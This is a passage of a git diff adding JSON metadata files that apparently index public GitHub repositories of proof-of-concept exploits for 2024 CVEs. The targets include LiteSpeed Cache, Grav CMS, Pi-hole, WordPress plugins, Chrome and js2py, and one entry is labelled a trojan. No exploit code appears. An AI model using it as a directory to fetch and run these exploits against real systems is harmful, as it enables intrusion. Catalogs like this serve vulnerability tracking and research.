"arch1m3d\/CVE-2024-28000", + "owner": { + "login": "arch1m3d", + "id": 179568627, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179568627?v=4", + "html_url": "https:\/\/github.com\/arch1m3d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/arch1m3d\/CVE-2024-28000", + "description": "PoC for the CVE-2024 Litespeed Cache Privilege Escalation ", + "fork": false, + "created_at": "2024-08-27T07:20:44Z", + "updated_at": "2024-09-11T18:56:34Z", + "pushed_at": "2024-08-30T06:43:29Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 854418896, + "name": "CVE-2024-28000", + "full_name": "SSSSuperX\/CVE-2024-28000", + "owner": { + "login": "SSSSuperX", + "id": 46961265, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46961265?v=4", + "html_url": "https:\/\/github.com\/SSSSuperX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SSSSuperX\/CVE-2024-28000", + "description": "CVE-2024-28000 LiteSpeed Cache Privilege Escalation Scan&Exp", + "fork": false, + "created_at": "2024-09-09T06:19:54Z", + "updated_at": "2024-09-09T07:06:51Z", + "pushed_at": "2024-09-09T07:06:40Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 855053349, + "name": "CVE-2024-28000", + "full_name": "JohnDoeAnonITA\/CVE-2024-28000", + "owner": { + "login": "JohnDoeAnonITA", + "id": 162304433, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/162304433?v=4", + "html_url": "https:\/\/github.com\/JohnDoeAnonITA", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JohnDoeAnonITA\/CVE-2024-28000", + "description": "CVE-2024-28000 Exploit for litespeed-cache =<6.3 allows Privilege Escalation with creation of administrator account", + "fork": false, + "created_at": "2024-09-10T08:16:16Z", + "updated_at": "2024-09-13T16:27:27Z", + "pushed_at": "2024-09-11T15:52:39Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-28085.json b/2024/CVE-2024-28085.json new file mode 100644 index 0000000000..e12243110d --- /dev/null +++ b/2024/CVE-2024-28085.json @@ -0,0 +1,75 @@ +[ + { + "id": 770117095, + "name": "CVE-2024-28085", + "full_name": "skyler-ferrante\/CVE-2024-28085", + "owner": { + "login": "skyler-ferrante", + "id": 24577503, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24577503?v=4", + "html_url": "https:\/\/github.com\/skyler-ferrante", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/skyler-ferrante\/CVE-2024-28085", + "description": "WallEscape vulnerability in util-linux", + "fork": false, + "created_at": "2024-03-11T00:15:03Z", + "updated_at": "2024-11-20T16:30:42Z", + "pushed_at": "2024-03-30T01:32:02Z", + "stargazers_count": 49, + "watchers_count": 49, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "exploit", + "privesc", + "privilege-escalation", + "redteam", + "vulnerability" + ], + "visibility": "public", + "forks": 8, + "watchers": 49, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 848156045, + "name": "sleepall", + "full_name": "oditynet\/sleepall", + "owner": { + "login": "oditynet", + "id": 16400007, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16400007?v=4", + "html_url": "https:\/\/github.com\/oditynet", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/oditynet\/sleepall", + "description": "trojan CVE-2024-28085 CVE 28085", + "fork": false, + "created_at": "2024-08-27T08:34:15Z", + "updated_at": "2024-08-28T05:45:46Z", + "pushed_at": "2024-08-28T05:44:26Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "28085", + "cve", + "trojan" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-28088.json b/2024/CVE-2024-28088.json new file mode 100644 index 0000000000..3499cedfd4 --- /dev/null +++ b/2024/CVE-2024-28088.json @@ -0,0 +1,33 @@ +[ + { + "id": 771904991, + "name": "cve-2024-28088-poc", + "full_name": "levpachmanov\/cve-2024-28088-poc", + "owner": { + "login": "levpachmanov", + "id": 31389480, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31389480?v=4", + "html_url": "https:\/\/github.com\/levpachmanov", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/levpachmanov\/cve-2024-28088-poc", + "description": null, + "fork": false, + "created_at": "2024-03-14T07:02:11Z", + "updated_at": "2024-03-14T07:03:15Z", + "pushed_at": "2024-03-14T07:43:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-28116.json b/2024/CVE-2024-28116.json new file mode 100644 index 0000000000..bbc1e4f8a4 --- /dev/null +++ b/2024/CVE-2024-28116.json @@ -0,0 +1,105 @@ +[ + { + "id": 776776802, + "name": "Graver", + "full_name": "akabe1\/Graver", + "owner": { + "login": "akabe1", + "id": 46047144, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46047144?v=4", + "html_url": "https:\/\/github.com\/akabe1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/akabe1\/Graver", + "description": "Proof of Concept script to exploit the authenticated SSTI+RCE in Grav CMS (CVE-2024-28116)", + "fork": false, + "created_at": "2024-03-24T13:14:52Z", + "updated_at": "2024-11-20T16:30:43Z", + "pushed_at": "2024-03-24T14:49:01Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 853633561, + "name": "Grav-CMS-RCE-Authenticated", + "full_name": "gunzf0x\/Grav-CMS-RCE-Authenticated", + "owner": { + "login": "gunzf0x", + "id": 31874167, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31874167?v=4", + "html_url": "https:\/\/github.com\/gunzf0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gunzf0x\/Grav-CMS-RCE-Authenticated", + "description": "Exploit against Grav CMS (versions below 1.7.45) that allows Remote Code Execution for an authenticated user - CVE-2024-28116", + "fork": false, + "created_at": "2024-09-07T05:00:19Z", + "updated_at": "2024-10-04T22:16:41Z", + "pushed_at": "2024-09-07T05:20:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-28116", + "exploit", + "grav-cms", + "payload", + "rce", + "remote-code-execution", + "server-side-template-injection", + "ssti", + "ssti-payloads" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 868072354, + "name": "GenGravSSTIExploit", + "full_name": "geniuszlyy\/GenGravSSTIExploit", + "owner": { + "login": "geniuszlyy", + "id": 137893386, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/137893386?v=4", + "html_url": "https:\/\/github.com\/geniuszlyy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geniuszlyy\/GenGravSSTIExploit", + "description": "is a PoC Python script that exploits an authenticated Server-Side Template Injection (SSTI) vulnerability in Grav CMS versions <= 1.7.44 (CVE-2024-28116)", + "fork": false, + "created_at": "2024-10-05T12:05:06Z", + "updated_at": "2024-10-21T08:15:12Z", + "pushed_at": "2024-10-05T12:08:37Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-28247.json b/2024/CVE-2024-28247.json new file mode 100644 index 0000000000..e4db4658a0 --- /dev/null +++ b/2024/CVE-2024-28247.json @@ -0,0 +1,33 @@ +[ + { + "id": 780056999, + "name": "CVE-2024-28247-Pi-hole-Arbitrary-File-Read", + "full_name": "T0X1Cx\/CVE-2024-28247-Pi-hole-Arbitrary-File-Read", + "owner": { + "login": "T0X1Cx", + "id": 71453093, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71453093?v=4", + "html_url": "https:\/\/github.com\/T0X1Cx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/T0X1Cx\/CVE-2024-28247-Pi-hole-Arbitrary-File-Read", + "description": "This repository provides an exploit for CVE-2024-28247, highlighting a vulnerability that permits a remote attacker to read arbitrary files on the system.", + "fork": false, + "created_at": "2024-03-31T15:25:15Z", + "updated_at": "2024-11-20T16:30:43Z", + "pushed_at": "2024-03-31T15:49:26Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-28255.json b/2024/CVE-2024-28255.json new file mode 100644 index 0000000000..cba1592e04 --- /dev/null +++ b/2024/CVE-2024-28255.json @@ -0,0 +1,33 @@ +[ + { + "id": 785532678, + "name": "CVE-2024-28255", + "full_name": "YongYe-Security\/CVE-2024-28255", + "owner": { + "login": "YongYe-Security", + "id": 90460865, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90460865?v=4", + "html_url": "https:\/\/github.com\/YongYe-Security", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/YongYe-Security\/CVE-2024-28255", + "description": "OpenMetadata_RCE (CVE-2024-28255) Batch scan\/exploit", + "fork": false, + "created_at": "2024-04-12T04:29:58Z", + "updated_at": "2024-11-06T23:16:20Z", + "pushed_at": "2024-04-12T04:41:18Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-28397.json b/2024/CVE-2024-28397.json new file mode 100644 index 0000000000..aea8bec40d --- /dev/null +++ b/2024/CVE-2024-28397.json @@ -0,0 +1,64 @@ +[ + { + "id": 817083025, + "name": "CVE-2024-28397-js2py-Sandbox-Escape", + "full_name": "Marven11\/CVE-2024-28397-js2py-Sandbox-Escape", + "owner": { + "login": "Marven11", + "id": 110723864, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110723864?v=4", + "html_url": "https:\/\/github.com\/Marven11", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Marven11\/CVE-2024-28397-js2py-Sandbox-Escape", + "description": "CVE-2024-28397: js2py sandbox escape, bypass pyimport restriction.", + "fork": false, + "created_at": "2024-06-19T01:46:33Z", + "updated_at": "2024-11-22T01:41:08Z", + "pushed_at": "2024-07-29T04:42:43Z", + "stargazers_count": 29, + "watchers_count": 29, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 29, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 818088894, + "name": "CVE-2024-28397-js2py-Sandbox-Escape", + "full_name": "CYBER-WARRIOR-SEC\/CVE-2024-28397-js2py-Sandbox-Escape", + "owner": { + "login": "CYBER-WARRIOR-SEC", + "id": 168237449, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168237449?v=4", + "html_url": "https:\/\/github.com\/CYBER-WARRIOR-SEC", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CYBER-WARRIOR-SEC\/CVE-2024-28397-js2py-Sandbox-Escape", + "description": null, + "fork": false, + "created_at": "2024-06-21T04:43:21Z", + "updated_at": "2024-06-29T21:42:12Z", + "pushed_at": "2024-06-29T21:42:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-28515.json b/2024/CVE-2024-28515.json new file mode 100644 index 0000000000..d01c610156 --- /dev/null +++ b/2024/CVE-2024-28515.json @@ -0,0 +1,33 @@ +[ + { + "id": 774130695, + "name": "CVE-2024-28515", + "full_name": "heshi906\/CVE-2024-28515", + "owner": { + "login": "heshi906", + "id": 132426770, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/132426770?v=4", + "html_url": "https:\/\/github.com\/heshi906", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/heshi906\/CVE-2024-28515", + "description": "A vuln about csapp.", + "fork": false, + "created_at": "2024-03-19T01:53:48Z", + "updated_at": "2024-03-23T16:52:04Z", + "pushed_at": "2024-03-30T15:08:17Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-28589.json b/2024/CVE-2024-28589.json new file mode 100644 index 0000000000..0dc0d04f3b --- /dev/null +++ b/2024/CVE-2024-28589.json @@ -0,0 +1,33 @@ +[ + { + "id": 781546021, + "name": "CVE-2024-28589", + "full_name": "Alaatk\/CVE-2024-28589", + "owner": { + "login": "Alaatk", + "id": 21007805, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21007805?v=4", + "html_url": "https:\/\/github.com\/Alaatk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Alaatk\/CVE-2024-28589", + "description": "Local Privilege Escalation Vulnerability on Axigen for Windows", + "fork": false, + "created_at": "2024-04-03T15:31:02Z", + "updated_at": "2024-04-17T11:47:56Z", + "pushed_at": "2024-04-03T15:38:03Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-28715.json b/2024/CVE-2024-28715.json new file mode 100644 index 0000000000..3d79ee02b1 --- /dev/null +++ b/2024/CVE-2024-28715.json @@ -0,0 +1,33 @@ +[ + { + "id": 771275327, + "name": "CVE-2024-28715", + "full_name": "Lq0ne\/CVE-2024-28715", + "owner": { + "login": "Lq0ne", + "id": 52685569, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52685569?v=4", + "html_url": "https:\/\/github.com\/Lq0ne", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Lq0ne\/CVE-2024-28715", + "description": null, + "fork": false, + "created_at": "2024-03-13T01:59:57Z", + "updated_at": "2024-03-13T01:59:57Z", + "pushed_at": "2024-03-13T02:14:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-28741.json b/2024/CVE-2024-28741.json new file mode 100644 index 0000000000..505a8a9bcb --- /dev/null +++ b/2024/CVE-2024-28741.json @@ -0,0 +1,33 @@ +[ + { + "id": 770691742, + "name": "CVE-2024-28741-northstar-agent-rce-poc", + "full_name": "chebuya\/CVE-2024-28741-northstar-agent-rce-poc", + "owner": { + "login": "chebuya", + "id": 146861503, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/146861503?v=4", + "html_url": "https:\/\/github.com\/chebuya", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chebuya\/CVE-2024-28741-northstar-agent-rce-poc", + "description": "Agent RCE PoC for CVE-2024-28741, a stored XSS vulnerability in NorthStar C2.", + "fork": false, + "created_at": "2024-03-12T01:40:35Z", + "updated_at": "2024-04-16T23:51:09Z", + "pushed_at": "2024-03-12T02:16:50Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-28757.json b/2024/CVE-2024-28757.json new file mode 100644 index 0000000000..bbc2e9904b --- /dev/null +++ b/2024/CVE-2024-28757.json @@ -0,0 +1,95 @@ +[ + { + "id": 795435234, + "name": "expat_CVE-2024-28757", + "full_name": "RenukaSelvar\/expat_CVE-2024-28757", + "owner": { + "login": "RenukaSelvar", + "id": 165150685, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/165150685?v=4", + "html_url": "https:\/\/github.com\/RenukaSelvar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RenukaSelvar\/expat_CVE-2024-28757", + "description": null, + "fork": false, + "created_at": "2024-05-03T09:21:27Z", + "updated_at": "2024-05-03T09:27:12Z", + "pushed_at": "2024-05-03T09:27:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 795436472, + "name": "expat_2_1_0_CVE-2024-28757", + "full_name": "saurabh2088\/expat_2_1_0_CVE-2024-28757", + "owner": { + "login": "saurabh2088", + "id": 52776238, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52776238?v=4", + "html_url": "https:\/\/github.com\/saurabh2088", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/saurabh2088\/expat_2_1_0_CVE-2024-28757", + "description": null, + "fork": false, + "created_at": "2024-05-03T09:24:51Z", + "updated_at": "2024-05-03T11:01:45Z", + "pushed_at": "2024-05-03T10:55:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 795453931, + "name": "expat_2_1_1_CVE-2024-28757", + "full_name": "saurabh2088\/expat_2_1_1_CVE-2024-28757", + "owner": { + "login": "saurabh2088", + "id": 52776238, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52776238?v=4", + "html_url": "https:\/\/github.com\/saurabh2088", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/saurabh2088\/expat_2_1_1_CVE-2024-28757", + "description": null, + "fork": false, + "created_at": "2024-05-03T10:11:38Z", + "updated_at": "2024-05-03T10:11:38Z", + "pushed_at": "2024-05-03T10:11:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-2876.json b/2024/CVE-2024-2876.json new file mode 100644 index 0000000000..ebff6a8807 --- /dev/null +++ b/2024/CVE-2024-2876.json @@ -0,0 +1,157 @@ +[ + { + "id": 791752007, + "name": "CVE-2024-2876", + "full_name": "c0d3zilla\/CVE-2024-2876", + "owner": { + "login": "c0d3zilla", + "id": 168064397, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168064397?v=4", + "html_url": "https:\/\/github.com\/c0d3zilla", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/c0d3zilla\/CVE-2024-2876", + "description": "POC for SQLi vulnerability in Icegram express ", + "fork": false, + "created_at": "2024-04-25T09:53:22Z", + "updated_at": "2024-09-26T13:11:40Z", + "pushed_at": "2024-04-25T09:55:55Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 857423263, + "name": "CVE-2024-2876", + "full_name": "Quantum-Hacker\/CVE-2024-2876", + "owner": { + "login": "Quantum-Hacker", + "id": 140636140, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/140636140?v=4", + "html_url": "https:\/\/github.com\/Quantum-Hacker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Quantum-Hacker\/CVE-2024-2876", + "description": null, + "fork": false, + "created_at": "2024-09-14T16:08:56Z", + "updated_at": "2024-09-15T15:53:54Z", + "pushed_at": "2024-09-15T15:53:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 858561765, + "name": "CVE-2024-2876", + "full_name": "0xAgun\/CVE-2024-2876", + "owner": { + "login": "0xAgun", + "id": 78228966, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78228966?v=4", + "html_url": "https:\/\/github.com\/0xAgun", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xAgun\/CVE-2024-2876", + "description": null, + "fork": false, + "created_at": "2024-09-17T05:54:18Z", + "updated_at": "2024-11-07T22:31:55Z", + "pushed_at": "2024-09-17T05:54:52Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 870293883, + "name": "CVE-2024-2876", + "full_name": "skyrowalker\/CVE-2024-2876", + "owner": { + "login": "skyrowalker", + "id": 156471538, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/156471538?v=4", + "html_url": "https:\/\/github.com\/skyrowalker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/skyrowalker\/CVE-2024-2876", + "description": null, + "fork": false, + "created_at": "2024-10-09T19:24:53Z", + "updated_at": "2024-10-11T20:09:19Z", + "pushed_at": "2024-10-11T20:09:16Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 889247775, + "name": "CVE-2024-2876", + "full_name": "issamjr\/CVE-2024-2876", + "owner": { + "login": "issamjr", + "id": 101994309, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101994309?v=4", + "html_url": "https:\/\/github.com\/issamjr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/issamjr\/CVE-2024-2876", + "description": "WP-SQL-Injection CVE-2024-2876 AND 2024-CVE-2024-3495", + "fork": false, + "created_at": "2024-11-15T22:39:48Z", + "updated_at": "2024-11-20T16:31:11Z", + "pushed_at": "2024-11-15T22:50:43Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-2879.json b/2024/CVE-2024-2879.json new file mode 100644 index 0000000000..f7eb73d0e6 --- /dev/null +++ b/2024/CVE-2024-2879.json @@ -0,0 +1,33 @@ +[ + { + "id": 783878190, + "name": "CVE-2024-2879", + "full_name": "herculeszxc\/CVE-2024-2879", + "owner": { + "login": "herculeszxc", + "id": 62851950, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62851950?v=4", + "html_url": "https:\/\/github.com\/herculeszxc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/herculeszxc\/CVE-2024-2879", + "description": "CVE-2024-2879 - LayerSlider 7.9.11 - 7.10.0 - Unauthenticated SQL Injection", + "fork": false, + "created_at": "2024-04-08T18:50:02Z", + "updated_at": "2024-11-02T03:07:10Z", + "pushed_at": "2024-04-08T19:16:28Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 21, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-2887.json b/2024/CVE-2024-2887.json new file mode 100644 index 0000000000..04010ce34f --- /dev/null +++ b/2024/CVE-2024-2887.json @@ -0,0 +1,64 @@ +[ + { + "id": 847220455, + "name": "Chrome-CVE-2024-2887-RCE-POC", + "full_name": "PumpkinBridge\/Chrome-CVE-2024-2887-RCE-POC", + "owner": { + "login": "PumpkinBridge", + "id": 139355470, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/139355470?v=4", + "html_url": "https:\/\/github.com\/PumpkinBridge", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PumpkinBridge\/Chrome-CVE-2024-2887-RCE-POC", + "description": "Chrome(CVE-2024-2887)RCE-POC", + "fork": false, + "created_at": "2024-08-25T07:30:25Z", + "updated_at": "2024-09-21T17:20:40Z", + "pushed_at": "2024-08-25T07:33:36Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 847293372, + "name": "CVE-2024-2887", + "full_name": "rycbar77\/CVE-2024-2887", + "owner": { + "login": "rycbar77", + "id": 35279858, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35279858?v=4", + "html_url": "https:\/\/github.com\/rycbar77", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rycbar77\/CVE-2024-2887", + "description": "For V8CTF M123", + "fork": false, + "created_at": "2024-08-25T12:13:07Z", + "updated_at": "2024-11-12T04:35:38Z", + "pushed_at": "2024-08-25T13:04:44Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-28987.json b/2024/CVE-2024-28987.json new file mode 100644 index 0000000000..091ddeb427 --- /dev/null +++ b/2024/CVE-2024-28987.json @@ -0,0 +1,126 @@ +[ + { + "id": 852696537, + "name": "CVE-2024-28987-POC", + "full_name": "gh-ost00\/CVE-2024-28987-POC", + "owner": { + "login": "gh-ost00", + "id": 153366162, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153366162?v=4", + "html_url": "https:\/\/github.com\/gh-ost00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gh-ost00\/CVE-2024-28987-POC", + "description": "Web Help Desk Hardcoded Credential Vulnerability (CVE-2024-28987)", + "fork": false, + "created_at": "2024-09-05T09:01:58Z", + "updated_at": "2024-11-13T14:39:23Z", + "pushed_at": "2024-09-05T09:23:59Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 862512431, + "name": "CVE-2024-28987", + "full_name": "horizon3ai\/CVE-2024-28987", + "owner": { + "login": "horizon3ai", + "id": 79593994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4", + "html_url": "https:\/\/github.com\/horizon3ai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2024-28987", + "description": "Proof of Concept Exploit for CVE-2024-28987: SolarWinds Web Help Desk Hardcoded Credential Vulnerability", + "fork": false, + "created_at": "2024-09-24T18:12:38Z", + "updated_at": "2024-10-09T19:42:18Z", + "pushed_at": "2024-09-24T18:27:47Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": 